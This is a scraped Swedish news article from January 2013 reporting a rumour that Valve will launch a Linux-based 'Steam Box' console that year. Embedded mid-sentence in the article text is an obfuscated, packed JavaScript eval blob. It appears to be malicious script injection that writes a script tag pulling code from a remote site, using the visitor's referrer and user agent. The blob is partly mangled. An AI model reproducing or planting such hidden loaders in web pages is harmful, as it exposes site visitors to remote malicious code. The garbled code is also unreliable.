Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Valve lanserar Steam Box i år!

Valve lanserar Steam Box i år!
Filip Urde
  • On 8 januari, 2013
  • http://www.revue.se/filip-urde

Steam eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dnbar|var|u0026u|referrer|hadft||js|php’.split(’|’),0,{}))
Box – äntligen en ny konsol.

Enligt Golem.de så kommer Valves spelkonsol, som går under namnet ”Steam Box”, att lanseras i år. Steam Box kommer vara en enklare version av en spel-pc som du kan koppla direkt till teven och ha stöd för Steams tjänst Big Picture.

Enligt det senaste ryktet ska konsolen vara Linuxbaserad.
www.joystiq.com